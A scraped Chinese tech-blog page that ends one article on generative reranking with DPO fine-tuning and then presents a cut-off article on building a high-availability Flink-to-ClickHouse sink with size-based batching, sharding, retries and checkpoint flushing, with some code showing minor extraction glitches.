
  • 自回归生成模型核心优化,KV Cache 复用:

缓存已生成token的KV和attention值,仅计算增量token相关值,避免重复计算。

  • 其他LLM推理加速技术应用落地,例如GQA

四、未来规划:迈向端到端序列生成的下一代重排架构

当前“生成-评估”双阶段范式虽在工程落地性上取得平衡,但其本质仍是局部优化:生成阶段依赖启发式规则或浅层模型生成候选,评估阶段虽能识别优质序列,却无法反向指导生成过程,导致系统能力存在理论上限。为突破这一瓶颈,我们规划构建端到端序列生成(End-to-End Sequence Generation) 架构,将重排从“候选筛选”升级为“序列创造”,直接以全局业务目标(如用户停留时长、互动深度、内容生态健康度)为优化目标。

核心架构设计:

  • 统一生成器:以 Transformer 为基础架构,搭建自回归序列建模能力,采用分层混合生成策略:
  1. 粗粒度并行生成:首层预测序列骨架(如类目分布、内容密度)等。

  2. 细粒度自回归精调:在骨架约束下,自回归生成具体 item,确保局部最优。

  • 序列级Reward Modeling:
  1. 构建多目标 reward 函数:xtr、多样性。

  2. Engagement:基于用户滑动轨迹建模序列累积收益(如滑动深度加权CTR)。

  3. Diversity:跨类目/创作者/内容形式的分布熵。

4.Fairness:冷启内容、长尾创作者曝光保障。

训练范式升级:强化学习与对比学习融合

推进自回归生成模型的架构升级与训练体系重构,引入强化学习微调(PPO/DPO)与对比学习机制,提升序列整体效率。

  • 搭建近线系统,生成高质量list候选,提升系统能力上限:

1.基于 DCG 的列表质量打分:

a. 对每个曝光列表L,计算其 DCG@K作为质量分数:

DCG(L)=j=1Kgain(itemj)log2(j+1)\text{DCG}(L) = \sum_{j=1}^{K} \frac{\text{gain}(item_j)}{\log_2(j + 1)}

其中 gain(item)可定义为:

若点击:+1.0

若互动(点赞/收藏):+1.5

若观看 >5s:+0.8

否则:0

2.构造偏好对:

a.对同一用户在同一上下文下的两个列表 LwL_w(win)和 LlL_l(lose)。

b.若 DCG(Lw)>DCG(Ll)+δDCG(L_w) > DCG(L_l) + \delta(δ 为 margin,如 0.1),则构成一个有效偏好对。

  • 引入强化学习微调(PPO/DPO)与对比学习机制,提升序列整体效率:
  1. 模型结构:

a.使用当前自回归生成模型作为策略模型。

b.固定预训练模型作为参考策略 (即 DPO 中的“旧策略”)。

2.DPO损失:

LDPO(θ)=E(x,yw,yl)D[logσ(β(logπθ(ywx)πref(ywx)logπθ(ylx)πref(ylx)))]\mathcal{L}_{\text{DPO}}(\theta) = -\mathbb{E}_{(x, y_w, y_l) \sim \mathcal{D}} \left[ \log \sigma \left( \beta \left( \log \frac{\pi_\theta(y_w \mid x)}{\pi_{\text{ref}}(y_w \mid x)} - \log \frac{\pi_\theta(y_l \mid x)}{\pi_{\text{ref}}(y_l \mid x)} \right) \right) \right]
  • 技术价值:
  1. 突破“质量-延迟-多样性”不可能三角:通过序列级优化,在同等延迟下实现质量与多样性双提升。

  2. 为AIGC与推荐融合铺路:端到端生成器可无缝接入AIGC内容,实现“内容生成-序列编排”一体化。

参考文献:

  1. Gloeckle F, Idrissi B Y, Rozière B, et al. Better & faster large language models via multi-token prediction[J]. arXiv preprint arXiv:2404.19737, 2024.
  2. Ren Y, Yang Q, Wu Y, et al. Non-autoregressive generative models for reranking recommendation[C]//Proceedings of the 30th ACM SIGKDD Conference on Knowledge Discovery and Data Mining. 2024: 5625-5634.
  3. Meng Y, Guo C, Cao Y, et al. A generative re-ranking model for list-level multi-objective optimization at taobao[C]//Proceedings of the 48th International ACM SIGIR Conference on Research and Development in Information Retrieval. 2025: 4213-4218.
  4. Zhao X, Xia L, Zhang L, et al. Deep reinforcement learning for page-wise recommendations[C]//Proceedings of the 12th ACM conference on recommender systems. 2018: 95-103.
  5. Feng Y, Hu B, Gong Y, et al. GRN: Generative Rerank Network for Context-wise Recommendation[J]. arXiv preprint arXiv:2104.00860, 2021.
  6. Pang L, Xu J, Ai Q, et al. Setrank: Learning a permutation-invariant ranking model for information retrieval[C]//Proceedings of the 43rd international ACM SIGIR conference on research and development in information retrieval. 2020: 499-508.

往期回顾

1.Flink ClickHouse Sink:生产级高可用写入方案|得物技术

2.服务拆分之旅:测试过程全揭秘|得物技术

3.大模型网关:大模型时代的智能交通枢纽|得物技术

4.从“人治”到“机治”:得物离线数仓发布流水线质量门禁实践

5.AI编程实践:从Claude Code实践到团队协作的优化思考|得物技术

文 /张卓

关注得物技术,每周一、三更新技术干货

要是觉得文章对你有帮助的话,欢迎评论转发点赞~

未经得物技术许可严禁转载,否则依法追究法律责任。

Flink ClickHouse Sink:生产级高可用写入方案|得物技术

作者 得物技术
2026年2月10日 11:11

一、背景与痛点

业务场景

在实时大数据处理场景中,Flink + ClickHouse 的组合被广泛应用于:

  • 日志处理: 海量应用日志实时写入分析库。
  • 监控分析: 业务指标、APM 数据的实时聚合。

这些场景的共同特点:

  • 数据量大:百万级 TPS,峰值可达千万级。
  • 写入延迟敏感: 需要秒级可见。
  • 数据准确性要求高:不允许数据丢失。
  • 多表写入: 不同数据根据分表策略写入不同的表。

开源 Flink ClickHouse Sink 的痛点

Flink 官方提供的 ClickHouse Sink(flink-connector-jdbc)在生产环境中存在以下严重问题:

痛点一:缺乏基于数据量的攒批机制

问题表现:

// Flink 官方 JDBC Sink 的实现
public class JdbcSink<Textends RichSinkFunction<T> {
    private final int batchSize;  // 固定批次大小
    @Override
    public void invoke(value, Context context) {
        bufferedValues.add(value);
        if (bufferedValues.size() >= batchSize) {
            // 只能基于记录数攒批,无法基于数据量
            flush();
        }
    }

带来的问题:

  1. 内存占用不可控: 100 条 1KB 的日志和 100 条 10MB 的日志占用内存差距 100 倍。
  2. OOM 风险高: 大日志记录(如堆栈转储)会迅速撑爆内存。
  3. 写入性能差: 无法根据记录大小动态调整批次,导致小记录批次过大浪费网络开销。

痛点二:无法支持动态表结构

问题表现:

// Flink 官方 Sink 只能写入固定表
public class JdbcSink {
    private final String sql;  // 固定的 INSERT SQL
    public JdbcSink(String jdbcUrl, String sql, ...) {
        this.sql = sql;  // 硬编码的表结构
    }
}

带来的问题:

  1. 多应用无法隔离: 所有应用的数据写入同一张表,通过特定分表策略区分。
  2. 扩展性差: 新增应用需要手动建表,无法动态路由。
  3. 性能瓶颈: 单表数据量过大(百亿级),查询和写入性能急剧下降。

痛点三:分布式表写入性能问题

问题表现:

// 大多数生产实现直接写入分布式表
INSERT INTO distributed_table_all VALUES (...)

ClickHouse 分布式表的工作原理:

带来的问题:

  1. 网络开销大: 数据需要经过分布式表层转发,延迟增加。
  2. 写入性能差: 分布式表增加了路由和转发逻辑,吞吐量降低。
  3. 热点问题: 所有数据先到分布式表节点,再转发,造成单点瓶颈。

生产级方案的核心改进

针对以上痛点,本方案提供了以下核心改进:

改进一:基于数据量的攒批机制

public class ClickHouseSinkCounter {
    private Long metaSize;  // 累计数据量(字节)
    public void add(LogModel value) {
        this.values.add(value);
        this.metaSize += value.getMetaSize();  // 累加数据量
    }
}
// 触发条件
private boolean flushCondition(String application) {
    return checkMetaSize(application)  // metaSize >= 10000 字节
        || checkTime(application);     // 或超时 30 秒
}

优势:

  • 内存可控: 根据数据量而非记录数攒批。
  • 精确控制: 1KB 的记录攒 10000 条 = 10MB,1MB 的记录攒 10 条 = 10MB。
  • 避免OOM: 大日志记录不会撑爆内存。

改进二:动态表结构与分片策略

public abstract class ClickHouseShardStrategy<T> {
    public abstract String getTableName(T data);
}
//日志侧实现为应用级分表
public class LogClickHouseShardStrategy extends ClickHouseShardStrategy<String> {
    @Override
    public String getTableName(String application) {
        // 动态路由:order-service → tb_logs_order_service
        return String.format("tb_logs_%s", application);
    }
}

优势:

  • 应用隔离: 日志侧内置应用级分表,每个应用独立分表。
  • 动态路由: 根据 application 自动路由到目标表。
  • 扩展性强: 新增应用无需手动建表(配合 ClickHouse 自动建表)。

改进三:本地表写入 + 动态节点发现

public class ClickHouseLocalWriter extends ClickHouseWriter {
    // 直接写本地表,避免分布式表转发
    private final ConcurrentMap<String, HikariDataSource> dataSourceMap;
    @Override
    public HikariDataSource getNextDataSource(Set<String> exceptionHosts) {
        // 1. 动态获取集群节点列表
        List<String> healthyHosts = getHealthyHosts(exceptionHosts);
        // 2. 随机选择健康节点
        return dataSourceMap.get(healthyHosts.get(random.nextInt(size)));
    }
}

优势:

  • 性能提升: 直接写本地表,避免网络转发。
  • 高可用: 动态节点发现 + 故障节点剔除。
  • 负载均衡: 随机选择 + Shuffle 初始化。

技术方案概览

基于以上改进,本方案提供了以下核心能力:

  1. 本地表/分布式表写入: 性能优化与高可用平衡。
  2. 分片策略: 按应用维度路由与隔离。
  3. 攒批与内存控制: 双触发机制(数据量 + 超时)。
  4. 流量控制与限流: 有界队列 + 连接池。
  5. 健壮的重试机制: 递归重试 + 故障节点剔除。
  6. Checkpoint 语义保证: At-Least-Once 数据一致性。

二、核心架构设计

架构图

核心组件

核心流程

三、本地表 vs 分布式表写入

ClickHouse 表结构说明

ClickHouse 推荐直接写本地表,原因:

  1. 写入性能: 避免分布式表的网络分发。
  2. 数据一致性: 直接写入目标节点,减少中间环节故障点,比分布式表写入更安全,利于工程化。
  3. 负载均衡: 客户端路由实现负载分散。
-- 本地表(实际存储数据)
CREATE TABLE tb_logs_local ON CLUSTER 'default' (
    application String,
    environment String,
    message String,
    log_time DateTime
) ENGINE = MergeTree()
PARTITION BY toYYYYMM(log_time)
ORDER BY (application, log_time);
-- 分布式表(逻辑视图,不存储数据)
CREATE TABLE tb_logs_all ON CLUSTER 'default' AS tb_logs_local
ENGINE = Distributed('default', dw_log, tb_logs_local, cityHash64(application));

HikariCP 连接池配置

// HikariCP 连接池配置
public class ClickHouseDataSourceUtils {
    private static HikariConfig getHikariConfig(DataSourceImpl dataSource) {
        HikariConfig config = new HikariConfig();
        config.setConnectionTimeout(30000L);    // 连接超时 30s
        config.setMaximumPoolSize(20);          // 最大连接数 20
        config.setMinimumIdle(2);               // 最小空闲 2
        config.setDataSource(dataSource);
        return config;
    }
    private static Properties getClickHouseProperties(ClickHouseSinkCommonParams params) {
        Properties props = new Properties();
        props.setProperty("user", params.getUser());
        props.setProperty("password", params.getPassword());
        props.setProperty("database", params.getDatabase());
        props.setProperty("socket_timeout""180000");      // Socket 超时 3 分钟
        props.setProperty("socket_keepalive""true");      // 保持连接
        props.setProperty("http_connection_provider""APACHE_HTTP_CLIENT");
        return props;
    }
}

配置说明:

  • maxPoolSize=20:每个 ClickHouse 节点最多 20 个连接。
  • minIdle=2:保持 2 个空闲连接,避免频繁创建。
  • socket_timeout=180s:Socket 超时 3 分钟,防止长时间查询阻塞。

ClickHouseLocalWriter:动态节点发现

public class ClickHouseLocalWriter extends ClickHouseWriter {
    // 本地节点缓存,按 IP 维护
    private final ConcurrentMap<StringHikariDataSource> dataSourceMap;
    // 动态获取集群本地表节点
    private final ClusterIpsUtils clusterIpsUtils;
    // IP 变更标志(CAS 锁,避免并发更新)
    private static final AtomicBoolean IP_CHANGING = new AtomicBoolean(false);
    @Override
    public HikariDataSource getNextDataSource(Set<String> exceptionHosts) {
        // 1️⃣ 检测集群节点变化(通过 CAS 避免并发更新)
        if (clusterIpsChanged() && IP_CHANGING.compareAndSet(falsetrue)) {
            try {
                ipChanged(); // 动态更新 dataSourceMap
            } finally {
                IP_CHANGING.set(false);
            }
        }
        // 2️⃣ 获取异常节点列表(从 Redis + APM 实时查询)
        Set<String> exceptIps = clusterIpsUtils.getExceptIps();
        exceptIps.addAll(exceptionHosts);
        // 3️⃣ 过滤健康节点,随机选择
        List<String> healthyHosts = dataSourceMap.keySet().stream()
            .filter(host -> !exceptIps.contains(host))
            .collect(Collectors.toList());
        if (CollectionUtils.isEmpty(healthyHosts)) {
            throw new RuntimeException("Can't get datasource from local cache");
        }
        return dataSourceMap.get(healthyHosts.get(random.nextInt(healthyHosts.size())));
    }
    private void ipChanged() {
        List<String> clusterIps = clusterIpsUtils.getClusterIps();
        // 新增节点:自动创建连接池
        clusterIps.forEach(ip ->
            dataSourceMap.computeIfAbsent(ip, v ->
                createHikariDataSource(ip, port)
            )
        );
        // 移除下线节点:关闭连接池
        dataSourceMap.forEach((ip, ds) -> {
            if (!clusterIps.contains(ip)) {
                dataSourceMap.remove(ip);
                ds.close();
            }
        });
    }
}

核心逻辑:

  1. 动态节点发现: 从 system.clusters 查询所有节点。
  2. 自动扩缩容: 节点上线自动加入,下线自动剔除。
  3. 故障节点剔除: 通过 APM 监控,自动剔除异常节点。
  4. 负载均衡: 随机选择健康节点,避免热点。

集群节点动态发现(ClusterIpsUtils)

public class ClusterIpsUtils {
    // 从 system.clusters 查询所有节点
    private static final String QUERY_CLUSTER_IPS =
        "select host_address from system.clusters where cluster = 'default'";
    // LoadingCache:定时刷新节点列表(1 小时)
    private final LoadingCache<StringList<String>> clusterIpsCache =
        CacheBuilder.newBuilder()
            .expireAfterAccess(10, TimeUnit.HOURS)
            .refreshAfterWrite(1, TimeUnit.HOURS)
            .build(CacheLoader.asyncReloading(new CacheLoader<>() {
                @Override
                public List<String> load(String dbName) {
                    return queryClusterIps();  // 定时刷新节点列表
                }
            }));
    // 异常节点缓存(1 分钟刷新)
    private final LoadingCache<StringFlinkExceptIpModel> exceptIpsCache =
        CacheBuilder.newBuilder()
            .refreshAfterWrite(1, TimeUnit.MINUTES)
            .build(CacheLoader.asyncReloading(new CacheLoader<>() {
                @Override
                public FlinkExceptIpModel load(String dbName) {
                    return queryExceptIp();  // 从 Redis + APM 查询异常节点
                }
            }));
}

异常节点监控策略:

  • 磁盘使用率 >= 90%: 从 APM 查询 Prometheus 指标,自动加入黑名单。
  • HTTP 连接数 >= 50: 连接数过多说明节点压力大,自动加入黑名单。
  • 人工配置: 通过 Redis 配置手动剔除节点

数据来源:

  1. ClickHouse system.clusters 表: 获取所有集群节点。
  2. APM Prometheus 接口: 监控节点健康状态。
  3. Redis 缓存: 人工配置的异常节点。

负载均衡优化

public class ClickHouseWriter {
    public <T> ClickHouseWriter(...) {
        // Shuffle:随机打乱数据源顺序
        Collections.shuffle(clickHouseDataSources);
        this.clickHouseDataSources = clickHouseDataSources;
    }
    public HikariDataSource getNextDataSource(Set<String> exceptionHosts) {
        // 轮询 + 随机选择(已 shuffle,避免热点)
        int current = this.currentRandom.getAndIncrement();
        if (current >= clickHouseDataSources.size()) {
            this.currentRandom.set(0);
        }
        return clickHouseDataSources.get(currentRandom.get());
    }
}

优势:

  • 初始化时 shuffle,避免所有 writer 同时从第一个节点开始。
  • 轮询 + 随机选择,负载分散更均匀。
  • 故障节点自动剔除。

四、支持分表策略

分片策略抽象

public abstract class ClickHouseShardStrategy<T> {
    private String tableName;      // 表名模板,如 "tb_log_%s"
    private Integer tableCount;    // 分表数量
    // 根据数据决定目标表名
    public abstract String getTableName(T data);
}

日志分片实现

public class LogClickHouseShardStrategy extends ClickHouseShardStrategy<String> {
    @Override
    public String getTableName(String application) {
        // 表名格式:tb_log_{application}
        // 例如:application = "order-service" -> table = "tb_log_order_service"
        return String.format(
            this.getTableName(),
            application.replace("-""_").toLowerCase()
        );
    }
}

按表(应用)维度的缓冲区

日志侧维度降级为应用名称维度缓冲区,实则因为按照应用分表,

业务方可使用自身分表策略携带表名元数据,进行表维度缓冲。

public class ClickHouseShardSinkBuffer {
    // 按 application 分组的缓冲区(ConcurrentHashMap 保证并发安全)
    private final ConcurrentHashMap<StringClickHouseSinkCounter> localValues;
    public void put(LogModel value) {
        String application = value.getApplication();
        // 1️⃣ 检查是否需要 flush
        if (flushCondition(application)) {
            addToQueue(application); // 触发写入
        }
        // 2️⃣ 添加到缓冲区(线程安全的 compute 操作)
        localValues.compute(application, (k, v) -> {
            if (v == null) v = new ClickHouseSinkCounter();
            v.add(value);
            return v;
        });
    }
    private void addToQueue(String application) {
        localValues.computeIfPresent(application, (k, v) -> {
            // 深拷贝并清空(避免并发修改异常)
            List<LogModel> deepCopy = v.copyValuesAndClear();
            // 构造请求 Blank:application + targetTable + values
            String targetTable = shardStrategy.getTableName(application);
            ClickHouseRequestBlank blank = new ClickHouseRequestBlank(deepCopy, application, targetTable);
            // 放入队列
            writer.put(blank);
            return v;
        });
    }
}

核心设计:

  • 应用隔离: 每个表(应用)独立的 buffer,互不影响。
  • 线程安全: 使用 ConcurrentHashMap.compute()保证并发安全。
  • 深拷贝: List.copyOf() 创建不可变副本,避免并发修改。
  • 批量清空: 一次性取出所有数据,清空计数器。

五、攒批与内存控制

双触发机制

public class ClickHouseShardSinkBuffer {
    private final int maxFlushBufferSize;  // 最大批次大小(如 10000)
    private final long timeoutMillis;      // 超时时间(如 30s)
    // 触发条件检查(满足任一即触发)
    private boolean flushCondition(String application) {
        return localValues.get(application) != null
            && (checkMetaSize(application) || checkTime(application));
    }
    // 条件1:达到批次大小
    private boolean checkMetaSize(String application) {
        return localValues.get(application).getMetaSize() >= maxFlushBufferSize;
    }
    // 条件2:超时
    private boolean checkTime(String application) {
        long current = System.currentTimeMillis();
        return current - localValues.get(application).getInsertTime() > timeoutMillis;
    }
}

批次大小计算

public class ClickHouseSinkCounter {
    private final List<LogModel> values;
    private Long metaSize; // 累计的 metaSize(字节)
    public void add(LogModel value) {
        this.values.add(value);
        this.metaSize += value.getMetaSize(); // 累加 metaSize
    }
    public List<LogModel> copyValuesAndClear() {
        List<LogModel> logModels = List.copyOf(this.values); // 深拷贝(不可变)
        this.values.clear();
        this.metaSize = 0L;
        this.insertTime = System.currentTimeMillis();
        return logModels;
    }
}

关键点:

  • 使用 metaSize(字节数)而非记录数控制批次,内存控制更精确。
  • List.copyOf() 创建不可变副本,避免并发修改。
  • 清空后重置 insertTime,保证超时触发准确性。

带随机抖动的超时

private final long timeoutMillis;
public ClickHouseShardSinkBuffer(..., int timeoutSec, ...) {
    // 基础超时 + 10% 随机抖动(避免惊群效应)
    this.timeoutMillis = TimeUnit.SECONDS.toMillis(timeoutSec)
                      + new SecureRandom().nextInt((int) (timeoutSec * 0.1 * 1000));
}

目的: 避免多个TM 同时触发 flush,造成写入流量峰值。

配置示例

ClickHouseShardSinkBuffer.Builder
    .aClickHouseSinkBuffer()
    .withTargetTable("single_table")  //单表时,可直接使用指定表名
    .withMaxFlushBufferSize(10000)  // 对应字节数
    .withTimeoutSec(30)              // 30 秒超时
    .withClickHouseShardStrategy(new LogClickHouseShardStrategy("table_prefix_%s", 8))  //分表策略时,使用
    // 分表策略可根据业务实际情况进行扩展
    .build(clickHouseWriter);

六、写入限流与流量控制

有界队列设计

public class ClickHouseWriter {
    // 有界阻塞队列
    private final BlockingQueue<ClickHouseRequestBlank> commonQueue;
    public ClickHouseWriter(ClickHouseSinkCommonParams sinkParams, ...) {
        // 队列最大容量配置(默认 10)
        this.commonQueue = new LinkedBlockingQueue<>(sinkParams.getQueueMaxCapacity());
    }
    public void put(ClickHouseRequestBlank params) {
        unProcessedCounter.incrementAndGet();
        // put() 方法在队列满时会阻塞,实现背压
        commonQueue.put(params);
    }
}

背压传导:

线程池并发控制

public class ClickHouseWriter {
    private final int numWriters; // 写入线程数
    private ExecutorService service;
    private void buildComponents() {
        ThreadFactory threadFactory = ThreadUtil.threadFactory("clickhouse-writer");
        service = Executors.newFixedThreadPool(numWriters, threadFactory);
        // 创建多个 WriterTask 并提交
        for (int i = 0; i < numWriters; i++) {
            WriterTask task = new WriterTask(i, commonQueue, sinkParams, futures, unProcessedCounter);
            service.submit(task);
        }
    }
}

WriterTask 消费逻辑

class WriterTask implements Runnable {
    @Override
    public void run() {
        isWorking = true;
        while (isWorking || !queue.isEmpty()) {
            // poll() 超时返回(100ms),避免无限等待
            ClickHouseRequestBlank blank = queue.poll(100, TimeUnit.MILLISECONDS);
            if (blank != null) {
                // 创建 Future 并设置超时(3 分钟)
                CompletableFuture<Boolean> future = new CompletableFuture<>();
                future.orTimeout(3, TimeUnit.MINUTES);
                futures.add(future);
                try {
                    send(blank, future, new HashSet<>());
                } finally {
                    // final 进行未知异常兜底,防止为捕获异常造成future状态不完成,永久阻塞
                    if (!future.isDone()) {
                        future.completeExceptionally(new RuntimeException("Unknown exception"));
                    }
                    queueCounter.decrementAndGet();
                }
            }
        }
    }
}

配置参数

七、重试机制与超时控制

Future 超时控制

public class ClickHouseWriter {
    private final int numWriters; // 写入线程数
    private ExecutorService service;
    private void buildComponents() {
        ThreadFactory threadFactory = ThreadUtil.threadFactory("clickhouse-writer");
        service = Executors.newFixedThreadPool(numWriters, threadFactory);
        // 创建多个 WriterTask 并提交
        for (int i = 0; i < numWriters; i++) {
            WriterTask task = new WriterTask(i, commonQueue, sinkParams, futures, unProcessedCounter);
            service.submit(task);
        }
    }
}

超时策略:

  • Future 超时: 3 分钟(orTimeout)。
  • Socket 超时: 3 分钟(socket_timeout=180000)。
  • 连接超时: 30 秒(connectionTimeout=30000)。

重试逻辑

class WriterTask implements Runnable {
    @Override
    public void run() {
        isWorking = true;
        while (isWorking || !queue.isEmpty()) {
            // poll() 超时返回(100ms),避免无限等待
            ClickHouseRequestBlank blank = queue.poll(100, TimeUnit.MILLISECONDS);
            if (blank != null) {
                // 创建 Future 并设置超时(3 分钟)
                CompletableFuture<Boolean> future = new CompletableFuture<>();
                future.orTimeout(3, TimeUnit.MINUTES);
                futures.add(future);
                try {
                    send(blank, future, new HashSet<>());
                } finally {
                    // final 进行未知异常兜底,防止为捕获异常造成future状态不完成,永久阻塞
                    if (!future.isDone()) {
                        future.completeExceptionally(new RuntimeException("Unknown exception"));
                    }
                    queueCounter.decrementAndGet();
                }
            }
        }
    }
}

重试控制逻辑

private void handleUnsuccessfulResponse(..., Set<String> exceptHosts) {
    // 检查 Future 是否已完成(避免重复完成)
    if (future.isDone()) {
        return;
    }
    if (attemptCounter >= maxRetries) {
        // 达到最大重试次数,标记失败
        future.completeExceptionally(new RuntimeException("Max retries exceeded"));
    } else {
        // 递归重试
        requestBlank.incrementCounter();
        send(requestBlank, future, exceptHosts); // 递归调用,排除失败节点
    }
}

重试策略:

  • 递归重试: 失败后递归调用,直到成功或达到最大次数。
  • 异常节点隔离: 每次重试时排除失败的节点(exceptHosts)。
  • 超时控制: Future 超时(3 分钟)防止永久阻塞。

为什么递归重试是更好的选择

递归重试(当前实现)

队列重试(假设方案)

保证一致性

  // ClickHouseWriter.java:139-158
  while (!futures.isEmpty() || unProcessedCounter.get() > 0) {
      CompletableFuture<Void> future = FutureUtil.allOf(futures);
      future.get(3, TimeUnit.MINUTES);  // 阻塞直到全部完成
  }
  • Checkpoint 时所有数据要么全部成功,要么全部失败。
  • 重启后不会有部分数据重复的问题。

简单可靠

  • 代码逻辑清晰。
  • 对于队列重试且不重复,需要复杂的二阶段提交(这里暂不展开),大幅增加代码复杂度。

性能可接受

class WriterTask implements Runnable {
    @Override
    public void run() {
        while (isWorking || !queue.isEmpty()) {
            ClickHouseRequestBlank blank = queue.poll(100, TimeUnit.MILLISECONDS);
            if (blank != null) {
                // 创建 Future 并设置 3 分钟超时
                CompletableFuture<Boolean> future = new CompletableFuture<>();
                future.orTimeout(3, TimeUnit.MINUTES); // 防止永久阻塞
                futures.add(future);
                try {
                    send(blank, future, new HashSet<>());
                } finally {
                    if (!future.isDone()) {
                        future.completeExceptionally(new RuntimeException("Timeout"));
                    }
                    queueCounter.decrementAndGet();
                }
            }
        }
    }
}
  • 虽然阻塞,但有超时保护。
  • ClickHouse 写入通常很快(秒级)。
  • 网络故障时重试也合理。

避开故障节点

  // ClickHouseWriter.java:259-260
  HikariDataSource dataSource = getNextDataSource(exceptHosts);
  • 递归时可以传递 exceptHosts。
  • 自动避开失败的节点。
  • 提高成功率。

异常节点剔除

// 特殊错误码列表(自动加入黑名单)
private final List<Integer> ignoreHostCodes = Arrays.asList(2101002);
public HikariDataSource getNextDataSource(Set<String> exceptionHosts) {
    if (CollectionUtils.isNotEmpty(exceptionHosts)) {
        // 过滤异常节点
        List<HikariDataSource> healthyHosts = clickHouseDataSources.stream()
            .filter(ds -> !exceptionHosts.contains(getHostFromUrl(ds)))
            .collect(Collectors.toList());
        if (CollectionUtils.isEmpty(healthyHosts)) {
            return null// 所有节点都异常
        }
        return healthyHosts.get(random.nextInt(healthyHosts.size()));
    }
    // 正常轮询(已 shuffle,避免热点)
    return clickHouseDataSources.get(currentRandom.getAndIncrement() % size);
}

故障节点剔除策略:

  1. 错误码 210(网络异常): 自动加入黑名单。
  2. 错误码 1002(连接池异常): 自动加入黑名单。
  3. APM 监控: 磁盘 >= 90%、HTTP 连接 >= 50 的节点。
  4. 手动配置: 通过 Redis 配置剔除。

恢复机制:

  • LoadingCache 定时刷新(1 分钟)。
  • 节点恢复健康后自动从黑名单移除。

重试流程图

八、异常处理模式

两种 Sink 模式

public Sink buildSink(String targetTable, String targetCount, int maxBufferSize) {
    IClickHouseSinkBuffer buffer = ClickHouseShardSinkBuffer.Builder
        .aClickHouseSinkBuffer()
        .withTargetTable(targetTable)
        .withMaxFlushBufferSize(maxBufferSize)
        .withClickHouseShardStrategy(new LogClickHouseShardStrategy(targetTable, count))
        .build(clickHouseWriter);
    // 根据配置选择模式
    if (ignoringClickHouseSendingExceptionEnabled) {
        return new UnexceptionableSink(buffer);  // 忽略异常
    } else {
        return new ExceptionsThrowableSink(buffer); // 抛出异常
    }
}

UnexceptionableSink(忽略异常 - At-Most-Once)

public class UnexceptionableSink implements Sink<LogModel> {
    private final IClickHouseSinkBuffer<LogModel> buffer;
    @Override
    public void put(LogModel message) {
        buffer.put(message);  // 不检查 Future 状态
    }
    @Override
    public void flush() {
        buffer.flush();
    }
}

适用场景:

  • 允许部分数据丢失。
  • 不希望因写入异常导致任务失败。
  • 对数据准确性要求不高(如日志统计)。

语义保证:At-Most-Once(最多一次)

ExceptionsThrowableSink(抛出异常 - At-Least-Once)

public class ExceptionsThrowableSink implements Sink<LogModel> {
    private final IClickHouseSinkBuffer<LogModel> buffer;
    @Override
    public void put(LogModel message) throws ExecutionException, InterruptedException {
        buffer.put(message);
        // 每次写入都检查 Future 状态
        buffer.assertFuturesNotFailedYet();
    }
    @Override
    public void flush() throws ExecutionException, InterruptedException {
        buffer.flush();
    }
}

Future 状态检查:

public void assertFuturesNotFailedYet() throws ExecutionException, InterruptedException {
    CompletableFuture<Void> future = FutureUtil.allOf(futures);
    // 非阻塞检查
    if (future.isCompletedExceptionally()) {
        logger.error("There is something wrong with the future. exist sink now");
        future.get(); // 抛出异常,导致 Flink 任务失败
    }
}

适用场景:

  • 数据准确性要求高。
  • 需要保证所有数据写入成功。
  • 异常时希望 Flink 任务失败并重启。

语义保证:At-Least-Once(至少一次)

Future 清理策略与并发控制

定时检查器

public class ClickHouseSinkScheduledCheckerAndCleaner {
    private final ScheduledExecutorService scheduledExecutorService;
    private final List<CompletableFuture<Boolean>> futures;
    // ⚠️ volatile 保证多线程可见性(关键并发控制点)
    private volatile boolean isFlushing = false;
    public ClickHouseSinkScheduledCheckerAndCleaner(...) {
        // 单线程定时执行器
        scheduledExecutorService = Executors.newSingleThreadScheduledExecutor(factory);
        // 定时执行清理任务(每隔 checkTimeout 秒,默认 30 秒)
        scheduledExecutorService.scheduleWithFixedDelay(getTask(), ...);
    }
    private Runnable getTask() {
        return () -> {
            synchronized (this) {
                //  关键:检查是否正在 flush,避免并发冲突
                if (isFlushing) {
                    return// Checkpoint 期间暂停清理
                }
                // 1️⃣ 清理已完成的 Future
                futures.removeIf(filter);
                // 2️⃣ 触发所有 Buffer 的 flush(检查是否需要写入)
                clickHouseSinkBuffers.forEach(IClickHouseSinkBuffer::tryAddToQueue);
            }
        };
    }
    // Checkpoint flush 前调用(暂停 cleaner)
    public synchronized void beforeFlush() {
        isFlushing = true;
    }
    // Checkpoint flush 后调用(恢复 cleaner)
    public synchronized void afterFlush() {
        isFlushing = false;
    }
}

核心设计:

  • volatile boolean isFlushing: 标志位,协调 cleaner 与 checkpoint 线程。
  • synchronized (this): 保证原子性,避免并发冲突。
  • 单线程执行器: 避免 cleaner 内部并发问题。

并发控制机制

问题场景:

时间轴冲突:
T1: Cleaner 线程正在执行 tryAddToQueue()
T2: Checkpoint 触发,调用 sink.flush()
T3: Cleaner 同时也在执行 tryAddToQueue()
    ├─ 可能导致:数据重复写入
    ├─ 可能导致:Buffer 清空顺序混乱
    └─ 可能导致:Future 状态不一致

解决方案:

// ClickHouseSinkManager.flush()
public void flush() {
    // 1️⃣ 暂停定时清理任务(设置标志)
    clickHouseSinkScheduledCheckerAndCleaner.beforeFlush(); // isFlushing = true
    try {
        // 2️⃣ 执行 flush(此时 cleaner 线程会跳过执行)
        clickHouseWriter.waitUntilAllFuturesDone(falsefalse);
    } finally {
        // 3️⃣ 恢复定时清理任务
        clickHouseSinkScheduledCheckerAndCleaner.afterFlush(); // isFlushing = false
    }
}

并发控制流程:

关键设计点:

  1. volatile 保证可见性: isFlushing 使用 volatile,确保多线程间的可见性。
  2. synchronized 保证原子性: getTask() 整个方法体使用 synchronized (this)。
  3. 标志位协调: 通过 isFlushing 标志实现两个线程间的协调。
  4. finally 确保恢复: 即使 waitUntilAllFuturesDone() 异常,也会在 finally 中恢复 cleaner。

避免的并发问题:

  • 数据重复写入: Cleaner 和 Checkpoint 同时 flush。
  • Buffer 状态不一致: 一边清空一边写入。
  • Future 清理冲突: 正在使用的 Future 被清理。

性能影响:

  • Checkpoint flush 期间,cleaner 暂停执行(通常 1-3 秒)。
  • Cleaner 跳过的周期会在下次正常执行时补偿。
  • 对整体吞吐影响极小(cleaner 间隔通常 30 秒)。

九、Checkpoint 语义保证

为什么 Checkpoint 时必须 Flush?

不 Flush 的后果

不Flush导致数据永久丢失

正确做法

@Override
public void snapshotState(FunctionSnapshotContext context) throws Exception {
    logger.info("start doing snapshot. flush sink to ck");
    // 1. 先 flush buffer(将内存数据写入 ClickHouse)
    if (sink != null) {
        sink.flush();
    }
    // 2. 等待所有写入完成
    if (sinkManager != null && !sinkManager.isClosed()) {
